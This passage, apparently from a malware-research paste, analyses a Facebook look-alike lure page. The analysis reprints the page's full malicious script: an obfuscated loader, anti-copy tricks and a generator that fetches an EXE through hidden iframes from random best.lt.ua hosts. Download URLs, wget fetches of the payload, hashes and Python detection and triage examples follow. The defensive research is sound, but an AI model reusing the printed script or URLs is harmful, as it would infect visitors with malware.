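is why the packed blob above is full of `~`, `}` and `|`: each one is a dictionary
index band of 128 codes, and the `za` runs are codes whose low 7 bits are zero.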


// Decoded Second Step (extracted values / written):


<HTML><head><script>eval(unescape('
\166ar%20q%79%37%3D%27%27%3Bq%79%38%3D%53t%72ing%2Ef%72\157\155C%68a%72Cod\145%28%31%33%2C
%31%30%29%3B%66%6F%72%28i%3D%30%3Bi%3C%32%32%37%39%3B\151%2B%2B%29%7Bq%79%37%2B%3D\161%79%
38%7D%3Bfu\156%63t\151%6F\156%20qy%36%28%29%7B\151%66%28%21%64\157%63u\155%65%6Et%2E\141l%
6C%29%7Bd%6Fc\165me\156t%2Ew\162i%74%65%28\161\171%37%29%7D%7D%3B%71y%36%28%29%3Bf\165n\14
3\164\151o\156%20q%79%39%28%29%7B\172\151%39%3D%22%3Cs%22%2B%22p\141%6E%20%73%74yle%3D%27%
64\151sp\154\141y%3Anone%27%3E%3C\160%72%65%3E%22%2B%71%79%37%2B%22%3C%2F%70r\145%3E%3C%2F
\163%22%2B%22pan%3E%22%3B%7Ai%32%3D%6Eew%20\101%72%72%61y%28%27\141ft\145rBe%67in%27%2C%27
%62e\146\157\162e\105nd%27%2C%27\141%66ter\105%6E%64%27%2C%27%62%65f\157\162\145%42e%67%69
n%27%29%3B%7Ai%33%3D%6Ee\167%20Ar%72a\171%28%27\150t\155\154%27%2C%27h%65ad%27%2C%27b\157\
144y%27%29%3B\146%6F%72%28k%3D%30%3B%6B%3C%3Dz\151%33%2El%65ngt\150%3B\153%2B%2B%29%7B\172
i%34%3D%64\157\143%75m%65%6Et%2Eg%65%74%45\154e\155\145n\164%73%42%79Ta\147%4Eam\145%28z%6
9%33%5Bk%5D%29%3B\146%6F\162%28j%3D%30%3B\152%3C%3D%7Ai%34%2E%6C\145%6Eg\164h%3B\152%2B%2B
%29%7Bfor%28i%3D%30%3Bi%3C%3D%33%3Bi%2B%2B%29%7B%69f%28\172i%34%5B%6A%5D%29%7Bzi%34%5Bj%5D
%2E%69\156s\145\162%74\101\144ja\143%65\156tH%54%4D\114%28z\151%32%5B\151%5D%2Cz%69%39%29%
7D%7D%7D%7D%7D%3B'))</script><script>nsp = 'Old browser!';
// Browser flags: dl = old Netscape layers, oe = Opera, da = IE, ws = Firefox sidebar, zis = IE7/8
dl = document.layers;
oe = window.opera ? 1 : 0;
da = document.all && !oe;
ge = document.getElementById;
ws = window.sidebar ? true : false;
tN = navigator.userAgent.toLowerCase();
izN = tN.indexOf('netscape') >= 0 ? true : false;
zis = tN.indexOf('msie 7') >= 0 ? true : false;
zis8 = tN.indexOf('msie 8') >= 0 ? true : false;
zis |= zis8;
if (ws && !izN)
{
  quogl = 'iuy'
};
var msg = '';
function nem()
{
  return true
};
window.onerror = nem;   // swallow every script error
zOF = window.location.protocol.indexOf("file") != -1 ? true : false;
i7f = zis && !zOF ? true : false;
// IE: disable drag and the context menu, re-armed every 200 ms
if (da)
{
  document.ondragstart = function ()
  {
    return false
  };
  function cIE()
  {
    (msg);
    return false
  };
  function cc()
  {
    document.oncontextmenu = cIE;
    setTimeout("cc()", 200)
  };
  cc()
};
// Netscape/Firefox: swallow middle and right mouse buttons
function cNS(e)
{
  if (dl || ws)
  {
    if (e.which == 2 || e.which == 3)
    {
      (msg);
      return false
    }
  }
};
if (dl)
{
  document.captureEvents(Event.MOUSEDOWN);
  document.onmousedown = cNS
}
else
{
  document.onmouseup = cNS
};
document.oncontextmenu = new Function("return false");
if (oe)
{
  function ro(e)
  {
    if (event.button == 2)
    {
      alert(' ');
      return 0
    };
    return true
  };
  document.onmousedown = ro
};
// keep the status bar blank so hovered link targets are never shown
function ns9()
{
  window.status = ' ';
  setTimeout('ns9()', 1000);
  return true
};
if (!oe)
{
  ns9();
  document.onmouseover = ns9;
  document.onmouseout = ns9
};
// block mouse-drag selection everywhere except form controls
function u0(a)
{
  return false
};
function u1(e)
{
  return (e.target.tagName != null && e.target.tagName.search(
  '^(INPUT|TEXTAREA|BUTTON|SELECT|HTML)$') != -1)
};
function u2(e)
{
  if (e.which == 1)
  {
    window.captureEvents(Event.MOUSEMOVE);
    window.onmousemove = u0
  }
};
function u3(e)
{
  if (e.which == 1)
  {
    window.releaseEvents(Event.MOUSEMOVE);
    window.onmousemove = null
  }
};
if (dl)
{
  window.captureEvents(Event.MOUSEUP | Event.MOUSEDOWN);
  window.onmousedown = u2;
  window.onmouseup = u3
}
else if (ge && !da)
{
  document.onmousedown = u1
};
// wipe and reload the page if the selection contains the hidden 'qweasdzxc'
// marker (i.e. the user selected across the injected spans) or exceeds 40 chars
function nn()
{
  if (window.getSelection)
  {
    var t = window.getSelection().toString();
    if (t.indexOf('qweasdzxc') > 1 || t.length > 40)
    {
      document.body.innerHTML = '.';
      location.reload()
    };
    setTimeout("nn()", 200)
  }
};
nn();
function ni()
{
  if (da)
  {
    document.onselectstart = function ()
    {
      return false
    };
    setTimeout("ni()", 200)
  }
};
ni();
// IE other than 7/8 over http: a hidden off-screen button that clears the
// clipboard every 300 ms, starting three seconds after load
if (da && !oe && !i7f)
{
  fc = '<' +
  'div style="position:absolute;left:-1000px;top:-1000px;width:60px;height:35px;z-index:1">' + '<' +
  'input type="button" name="xqq" value="" onClick=ccd() style="visibility:hidden"><' + '/div>';
  document.write(fc);
  function ccd()
  {
    clipboardData.clearData()
  };
  function cce()
  {
    xqq.click();
    setTimeout("cce()", 300)
  };
  setTimeout("cce()", 3000)
};
if (zis8)
{
  window.attachEvent('onload', qy9)
};
</script><script id='lllI'>var ppconf = 0;
// Filler: 470 CRLF pairs wrapped as an HTML comment, a block comment, a hidden
// <pre>, and a random junk <script>, to bloat and confuse a saved copy of the DOM
var qy7 = '';
qy8 = String.fromCharCode(13, 10, 13, 10);
for (i = 0; i < 470; i++)
{
  qy7 += qy8
};
lI1I = "<" + "!--" + qy7 + "--" + ">";
III1 = "/" + "*" + qy7 + "*" + "/";
Illl = "<scr" + "ipt>" + lIII(1) + lIII(2) + "='" + lIII(3) + "'</scri" + "pt>";
l1II = "<s" + "pan style='display:none'><pre>" + qy7 + "</pre></s" + "pan>";
l1Il = l1II + lI1I + l1II;
Il11 = "<" + "span>";
I1l1 = "</" + "span>";
Ill1 = "<" + "span style='visibility:hidden'>qweasdzxc" + I1l1;
// On load: litter the DOM with the filler above. For each tag name in Il1I the
// low four bits of IIII[t] select insert positions (I111) and the remaining
// bits (m >>> 4) select which filler from lIIl; the table depends on the browser.
function l11I()
{
  I111 = new Array('beforeBegin', 'afterBegin', 'beforeEnd', 'afterEnd');
  Il1I = new Array('html', 'head', 'body', 'a', 'img', 'div', 'form', 'table', 'script',
  'input', 'p');
  lII1 = l1I1();
  switch (lII1)
  {
    case 1: IIII = new Array(79, 79, 79, 73, 73, 73, 73, 73, 73, 73, 73);
    break;
    case 2: IIII = new Array(38, 47, 47, 15, 41, 15, 9, 9, 22, 15, 15);
    break;
    case 3: IIII = new Array(0, 38, 38, 15, 9, 15, 9, 9, 22, 15, 15);
    break;
    case 4: IIII = new Array(38, 47, 47, 15, 41, 15, 9, 9, 22, 15, 15);
    break;
    default: IIII = new Array(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
  };
  lIIl = new Array(lI1I, III1, Illl, l1II, l1Il, Il11, I1l1, Ill1);
  I11l(document.getElementsByTagName(Il1I[2])[0], 2, lIIl[7]);
  for (t = 0; t < Il1I.length; t++)
  {
    m = IIII[t];
    I1lI = document.getElementsByTagName(Il1I[t]);
    ctaL = I1lI.length;
    for (j = 0; j < ctaL; j++)
    {
      for (x = 0; x < 4; x++)
      {
        if (m & Math.pow(2, x))
        {
          I11l(I1lI[j], x, lIIl[m >>> 4])
        }
      }
    }
  };
  IllI();
  I1ll();
  llll();
  lI1l();
  setTimeout('l11l()', 1000)
};
// wrap every image and link in a <span> (unless ppconf bits opt out)
function IllI()
{
  var I11I = document.images, IIIl = document.links, il = I11I.length, ll = IIIl.length,
  lll1;
  while (il)
  {
    Il1l = document.createElement('span');
    lll1 = I11I[--il];
    if (!(ppconf & 2))
    {
      try
      {
        Il1l.appendChild(lll1.parentNode.replaceChild(Il1l, lll1))
      }
      catch (e)
      {
      }
    }
  };
  while (ll)
  {
    Il1l = document.createElement('span');
    lll1 = IIIl[--ll];
    if (!(ppconf & 1))
    {
      try
      {
        Il1l.appendChild(lll1.parentNode.replaceChild(Il1l, lll1))
      }
      catch (e)
      {
      }
    }
  }
};
// neuter window.open, document.open and alert for anyone poking at the page
function I1ll()
{
  window.open = null;
  document.open = null;
  window.alert = null;
};
function llll()
{
  var extraFunc1Cntnt = 0
};
function lI1l()
{
  var extraFunc2Cntnt = 0
};
// insert HTML c at position p (0..3 = I111 order) relative to element e
function I11l(e, p, c)
{
  try
  {
    if (!window.sidebar)
    {
      e.insertAdjacentHTML(I111[p], c)
    }
    else
    {
      rcf = document.createRange().createContextualFragment(c);
      if (p == 0)
      {
        e.parentNode.insertBefore(rcf, e)
      };
      if (p == 1)
      {
        e.insertBefore(rcf, e.firstChild)
      };
      if (p == 2)
      {
        e.appendChild(rcf)
      };
      if (p == 3)
      {
        e.parentNode.insertBefore(rcf, e.nextSibling)
      }
    }
  }
  catch (xuu)
  {
  }
};
// random identifier / random numeric junk for the fake <script> filler
function lIII(j)
{
  r = Math.random();
  d = new Date().getTime();
  if (j == 1)
  {
    o = String.fromCharCode(Math.floor(r * 25 + 65))
  }
  else
  {
    o = Math.floor(r * d * 1000) + '';
    o += o;
    o += o;
    o += o
  };
  if (j == 3)
  {
    o += o;
    o += o
  };
  return o
};
if (typeof window.addEventListener != 'undefined')
{
  window.addEventListener('load', l11I, false)
}
else if (typeof document.addEventListener != 'undefined')
{
  document.addEventListener('load', l11I, false)
}
else if (typeof window.attachEvent != 'undefined')
{
  window.attachEvent('onload', l11I)
};
// browser id: 1 = IE, 2 = Firefox, 3 = Chrome/Safari, 4 = Opera, 10 = IE10
function l1I1()
{
  lII1 = 0;
  u = navigator.userAgent.toLowerCase();
  if (window.sidebar)
  {
    lII1 = 2
  };
  if (window.chrome)
  {
    lII1 = 3
  };
  if (window.opera)
  {
    lII1 = 4
  };
  if (document.all && lII1 !== 4)
  {
    lII1 = 1
  };
  if (u.indexOf('safari') > 1)
  {
    lII1 = 3
  };
  if ((lII1 == 1) && (u.indexOf('ie 10') > 1))
  {
    lII1 = 10
  };
  return lII1
}
</script> <script>function l11l()
{
  // one second after load, remove this whole script block from the DOM
  try
  {
    l111 = document.getElementById('lllI');
    l111.parentNode.removeChild(l111)
  }
  catch (errr)
  {
  }
}
</script>
  793.  
  794.  
  795. //===================================
  796. //THE THREAT STARTS HERE!!!
  797. //The DGA Downloader Engine..
  798. //#MalwareMustDie!
  799. //====================================
  800.  
<TITLE>Facebook</TITLE>
<META NAME="Generator" CONTENT="Facebook.com">
<META NAME="Author" CONTENT="Facebook.com">
<META NAME="Keywords" CONTENT="Wow, lol, awesome, cool">
<META NAME="Description" CONTENT="Wow! Have you ever seen?">
<link rel="shortcut icon" href="http://fbstatic-a.akamaihd.net/rsrc.php/yP/r/Ivn-CVe5TGK.ico" />
</HEAD>
<BODY>
<script type='text/javascript'>
// Random label generator. The alphabet is a-z WITHOUT 'j', so every label
// draws from 25 letters. A missing/zero length means "pick a random length
// 0..24"; genDomain() below always passes an explicit length.
function randomString(length)
{
  var chars = 'abcdefghiklmnopqrstuvwxyz'.split('');
  if (!length)
  {
    length = Math.floor(Math.random() * chars.length)
  };
  var str = '';
  for (var i = 0; i < length; i ++ )
  {
    str += chars[Math.floor(Math.random() * chars.length)]
  };
  return str
};
// The DGA: on every page load build a fresh download URL under best.lt.ua
// (random 6-letter host label, random 2-letter query key, random 4-letter
// value) and drop it into a 0x0 hidden iframe. Only the host label and the
// query string vary; the parent zone and the path dlimage4.php are fixed,
// which is what the mitigation string below relies on.
function genDomain()
{
  var sdom = 'http://' + randomString(6) + '.best.lt.ua/dlimage4.php?' + randomString(2) +
  '=' + randomString(4);
  document.write('<iframe src="' + sdom +
  '" width="0" height="0" frameborder="0"></iframe>');
};
genDomain()
</script>
<!-- Facebook look-alike lure; logo and favicon are hotlinked from Facebook's static CDN -->
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" align="center"><tbody>
<tr bgcolor="#3B5998" height="80"><td align="left" valign="center">
<IMG SRC="http://fbstatic-a.akamaihd.net/rsrc.php/v2/yX/x/Qq6L1haQrYr.png" BORDER="0" ALT=""></td></tr>
<tr bgcolor="#E7EBF2"><td align="center" valign="center">
<font face="lucida grande,tahoma,verdana,arial" color="#0E385F" size="+4"><B>
Download and execute the facebook app, please! You will be surprised :)</B></font></td></tr>
<tr bgcolor="#E7EBF2"><td align="center" valign="top">
<font face="lucida grande,tahoma,verdana,arial" color="#333333">Your download should be starting in 2 seconds...</font><BR><BR>
<!-- "click here" just reloads the page, which re-runs genDomain() and fetches from a new hostname -->
<A HREF="javascript:document.location.href=document.location.href;"><font face="lucida grande,tahoma,verdana,arial" color="#0E385F"><B>
If your download doesn't start, please click here</B></font></A></td></tr>
</tbody></table>
<script type='text/javascript'>
// 120000 ms = two minutes (not the "2 seconds" the lure promises), then the
// visitor is bounced to wickedreport.com.
window.setTimeout("document.location.href='http://wickedreport.com'", 120000)
</script>
</BODY></HTML>

===========================
MALICIOUS URL FOR DOWNLOAD
===========================
http://xizcvo.best.lt.ua/dlimage4.php?ol=bzhe
http://kvnkyp.best.lt.ua/dlimage4.php?ol=bzhe
http://lgktbu.best.lt.ua/dlimage4.php?zz=lwgb
http://eclrwr.best.lt.ua/dlimage4.php?zz=lwgb
http://xtkmcv.best.lt.ua/dlimage4.php?ol=bzhe
http://knqmlf.best.lt.ua/dlimage4.php?ol=qmark
and many more URLs of the same shape: only the six-letter host label and the query string change.
===========================
MITIGATION
===========================

Research search string and block string (NOTE: a plain substring, NOT a regex) = "best.lt.ua/dlimage4.php"
Block on this substring (or on the whole best.lt.ua zone) rather than on the individual hostnames observed: the host label is regenerated on every page load, so a blocklist of single hostnames can never keep up.
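To make the generator's output space and the matching logic concrete, here is an added Python example (not the paste's own code, which is the JavaScript above): a port of randomString()/genDomain() with a seedable RNG, a strict regex describing exactly what genDomain() can emit, and a hunt over a few constructed proxy log lines containing the URLs listed above. The log line format ('<timestamp> <client> GET <url>') and the client addresses are assumptions for the demo. It also shows why the plain substring is the right block string: the listed knqmlf URL carries a five-letter value that the strict shape does not match, and the query-less URLs fetched with wget in the PAYLOAD section below would be missed too, while the substring catches all of them.

```python
# Added example (not MalwareMustDie's code): Python port of the page's
# randomString()/genDomain() pair plus two ways of hunting for its output.
import random
import re

# Alphabet copied from the injected script: lowercase a-z with 'j' missing,
# so every label the DGA emits is drawn from these 25 letters.
CHARS = "abcdefghiklmnopqrstuvwxyz"

# The author's mitigation string: a plain substring, not a regex.
MITIGATION_STRING = "best.lt.ua/dlimage4.php"

# Strict shape of what genDomain() can produce: 6-letter host label,
# 2-letter query key, 4-letter value, all drawn from CHARS.
DGA_URL_RE = re.compile(
    r"^http://[a-ik-z]{6}\.best\.lt\.ua/dlimage4\.php\?[a-ik-z]{2}=[a-ik-z]{4}$"
)


def random_string(rng, length=None):
    """Port of randomString(): a falsy length means 'pick one at random'."""
    if not length:
        length = int(rng.random() * len(CHARS))
    return "".join(CHARS[int(rng.random() * len(CHARS))] for _ in range(length))


def gen_domain(rng):
    """Port of genDomain(): the iframe src the fake Facebook page writes."""
    return (
        "http://" + random_string(rng, 6) + ".best.lt.ua/dlimage4.php?"
        + random_string(rng, 2) + "=" + random_string(rng, 4)
    )


def sample_domain(seed):
    """Deterministic wrapper (seeded RNG) so a run can be reproduced."""
    return gen_domain(random.Random(seed))


def host_keyspace():
    """Number of distinct host labels the DGA can emit: 25 ** 6."""
    return len(CHARS) ** 6


def matches_dga_shape(url):
    return DGA_URL_RE.match(url) is not None


def hunt(log_lines):
    """Return (substring_hits, strict_hits) for a list of proxy log lines.

    Assumed (constructed) log format: '<timestamp> <client> GET <url>'.
    """
    substring_hits, strict_hits = [], []
    for line in log_lines:
        url = line.split()[-1]
        if MITIGATION_STRING in url:
            substring_hits.append(url)
        if matches_dga_shape(url):
            strict_hits.append(url)
    return substring_hits, strict_hits


# Constructed proxy log: the URLs listed on the page, one query-less
# download URL from the wget session below, and two benign lines.
SAMPLE_LOG = [
    "2013-11-07T06:08:22Z 10.0.0.12 GET http://xizcvo.best.lt.ua/dlimage4.php?ol=bzhe",
    "2013-11-07T06:08:31Z 10.0.0.12 GET http://www.facebook.com/",
    "2013-11-07T06:09:02Z 10.0.0.17 GET http://kvnkyp.best.lt.ua/dlimage4.php?ol=bzhe",
    "2013-11-07T06:09:40Z 10.0.0.17 GET http://lgktbu.best.lt.ua/dlimage4.php?zz=lwgb",
    "2013-11-07T06:10:05Z 10.0.0.23 GET http://eclrwr.best.lt.ua/dlimage4.php?zz=lwgb",
    "2013-11-07T06:10:44Z 10.0.0.23 GET http://xtkmcv.best.lt.ua/dlimage4.php?ol=bzhe",
    "2013-11-07T06:11:12Z 10.0.0.31 GET http://knqmlf.best.lt.ua/dlimage4.php?ol=qmark",
    "2013-11-07T06:11:50Z 10.0.0.31 GET http://example.com/images/dlimage4.png",
    "2013-11-07T06:12:03Z 10.0.0.40 GET http://paphgi.best.lt.ua/dlimage4.php",
]

if __name__ == "__main__":
    print("generated:", sample_domain(1337))
    print("possible host labels:", host_keyspace())
    sub, strict = hunt(SAMPLE_LOG)
    print("substring hits:", len(sub), "strict-shape hits:", len(strict))
    print("caught by substring only:", sorted(set(sub) - set(strict)))
```

The strict pattern is still useful as a research signature (it tells you a hit came from this exact generator), but the 25**6 possible host labels mean that enumerating or pre-registering them is pointless; blocking at the zone or on the fixed path is the practical control.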


===========================
PAYLOAD:
===========================

]$ wget http://paphgi.best.lt.ua/dlimage4.php
--2013-11-08 06:08:22--  http://paphgi.best.lt.ua/dlimage4.php
Resolving paphgi.best.lt.ua (paphgi.best.lt.ua)... 103.246.115.238
Connecting to paphgi.best.lt.ua (paphgi.best.lt.ua)|103.246.115.238|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 160768 (157K) [application/force-download]
Saving to: 'dlimage4.php'
100%[==============>] 160,768      405KB/s   in 0.4s
2013-11-08 06:08:24 (405 KB/s) - 'dlimage4.php' saved [160768/160768]

$ wget http://ahrcdv.best.lt.ua/dlimage4.php -O sample
--2013-11-08 06:20:15--  http://ahrcdv.best.lt.ua/dlimage4.php
Resolving ahrcdv.best.lt.ua (ahrcdv.best.lt.ua)... 103.246.115.238
Connecting to ahrcdv.best.lt.ua (ahrcdv.best.lt.ua)|103.246.115.238|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 160768 (157K) [application/force-download]
Saving to: 'sample2.exe'
100%[==============>] 160,768      349KB/s   in 0.5s
2013-11-08 06:20:16 (349 KB/s) - 'sample2.exe' saved [160768/160768]

// Note: two arbitrary generated hostnames both resolve to the same mothership
// (103.246.115.238) and return the same 160768-byte file, so best.lt.ua appears
// to carry a wildcard DNS entry and dlimage4.php just hands back a fixed EXE.
// The random host label exists only to defeat hostname-based blocking.

// bintext

0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   A0 5C EA C1 E4 3D 84 92 E4 3D 84 92 E4 3D 84 92    .....=...=...=..
0090   6A 22 97 92 F3 3D 84 92 C3 FB FF 92 E3 3D 84 92    j"...=.......=..
00A0   E4 3D 85 92 AD 3D 84 92 FA 6F 07 92 E5 3D 84 92    .=...=...o...=..
00B0   E4 3D 84 92 E6 3D 84 92 FA 6F 10 92 E5 3D 84 92    .=...=...o...=..
00C0   FA 6F 15 92 E5 3D 84 92 52 69 63 68 E4 3D 84 92    .o...=..Rich.=..
00D0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
00E0   50 45 00 00 4C 01 1C 00 CD A6 7B 52 00 00 00 00    PE..L.....{R....

https://www.virustotal.com/en/file/c86c44ad564ad33d9c92e41530933747dc954875cbad403b809d2a86567b34ef/analysis/
SHA256: c86c44ad564ad33d9c92e41530933747dc954875cbad403b809d2a86567b34ef
SHA1:   a98f5ae3e3f1dc174812706b7318708acae7af77
MD5:    d3fa25f8f7568735d36d565aa2b99c1a
File size:  157.0 KB ( 160768 bytes )
File name:  a98f5ae3e3f1dc174812706b7318708acae7af77
File type:  Win32 EXE
Tags:   peexe
Detection ratio:    5 / 47
Analysis date:  2013-11-07 14:55:28 UTC ( 6 hours, 18 minutes ago )
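As an added worked example (Python, not part of the paste), the dump above already contains enough to triage the file without having the sample: e_lfanew at offset 0x3C points to 0xE0, where the COFF file header gives Machine 0x014C (32-bit x86), NumberOfSections 0x1C (28) and TimeDateStamp 0x527BA6CD, i.e. 2013-11-07 14:42:21 UTC, 787 seconds before the VirusTotal analysis date quoted above. The "Rich" marker visible at 0xC8 means a Microsoft linker produced the file. Two caveats: the timestamp is written by the linker and is trivially forged, so it is a hint rather than evidence, and 28 sections is far more than a plainly compiled executable carries, which argues for a look at the section table the dump does not include. The hex dump embedded in the code is copied from the page; the parser and field layout follow the PE/COFF format.

```python
# Added example (not from the MalwareMustDie paste): pull the DOS header
# and COFF file header fields out of the hex dump printed above, using only
# the bytes the page shows (offsets 0x00-0xEF).
import struct
from datetime import datetime, timezone

# The dump exactly as printed on the page: offset, 16 hex bytes, ASCII column.
HEXDUMP = """
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   A0 5C EA C1 E4 3D 84 92 E4 3D 84 92 E4 3D 84 92    .....=...=...=..
0090   6A 22 97 92 F3 3D 84 92 C3 FB FF 92 E3 3D 84 92    j"...=.......=..
00A0   E4 3D 85 92 AD 3D 84 92 FA 6F 07 92 E5 3D 84 92    .=...=...o...=..
00B0   E4 3D 84 92 E6 3D 84 92 FA 6F 10 92 E5 3D 84 92    .=...=...o...=..
00C0   FA 6F 15 92 E5 3D 84 92 52 69 63 68 E4 3D 84 92    .o...=..Rich.=..
00D0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
00E0   50 45 00 00 4C 01 1C 00 CD A6 7B 52 00 00 00 00    PE..L.....{R....
"""

# VirusTotal analysis date quoted on the page.
VT_ANALYSIS_UTC = datetime(2013, 11, 7, 14, 55, 28, tzinfo=timezone.utc)


def parse_hexdump(text):
    """Turn 'OFFSET  b0 .. b15  ascii' rows back into bytes, checking contiguity."""
    data = bytearray()
    for row in text.strip().splitlines():
        fields = row.split()
        offset = int(fields[0], 16)
        if offset != len(data):
            raise ValueError("non-contiguous dump at 0x%X" % offset)
        # Only the 16 hex tokens after the offset; the ASCII column is ignored.
        data.extend(int(b, 16) for b in fields[1:17])
    return bytes(data)


def parse_pe_header(data):
    """Read the fields a first-look triage needs; raises on a non-PE blob."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    # e_lfanew: file offset of the PE signature, 4-byte LE at 0x3C.
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature at e_lfanew")
    # COFF file header right after the signature:
    # Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    machine, n_sections, time_date_stamp = struct.unpack_from(
        "<HHI", data, e_lfanew + 4
    )
    compiled = datetime.fromtimestamp(time_date_stamp, timezone.utc)
    return {
        "e_lfanew": e_lfanew,
        "machine": machine,          # 0x14C = IMAGE_FILE_MACHINE_I386
        "sections": n_sections,
        "timestamp": time_date_stamp,
        "compiled_utc": compiled.strftime("%Y-%m-%d %H:%M:%S"),
        # 'Rich' marker between the DOS stub and the PE header: the file was
        # linked by a Microsoft linker (the encoded block is not decoded here).
        "has_rich_header": b"Rich" in data[0x40:e_lfanew],
    }


def seconds_between_build_and_scan(header, scan_time=VT_ANALYSIS_UTC):
    """Link timestamp vs. first VirusTotal analysis: how fresh the build was."""
    return int(scan_time.timestamp()) - header["timestamp"]


if __name__ == "__main__":
    hdr = parse_pe_header(parse_hexdump(HEXDUMP))
    for key, value in hdr.items():
        shown = hex(value) if isinstance(value, int) and not isinstance(value, bool) else value
        print("%-16s %s" % (key, shown))
    print("built %d s before the VT analysis" % seconds_between_build_and_scan(hdr))
```

A build-to-submission gap measured in minutes is itself an indicator: combined with the 5/47 detection ratio it says the operators were compiling and pushing fresh binaries on the day of the analysis, so hash-based blocking of this one sample is short-lived and the network string above is the durable control.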

MORE PAYLOADS:

http://urlquery.net/search.php?q=best.lt.ua%2Fdlimage4.php&type=string&start=2013-10-23&end=2013-11-07&max=50

----
MalwareMustDie,NPO Research Group
Web http://malwaremustdie.org
Research blog: http://malwaremustdie.blogspot.com
Wiki & Code: http://code.google.com/p/malwaremustdie/
Report Pastes: http://pastebin.com/u/MalwareMustDie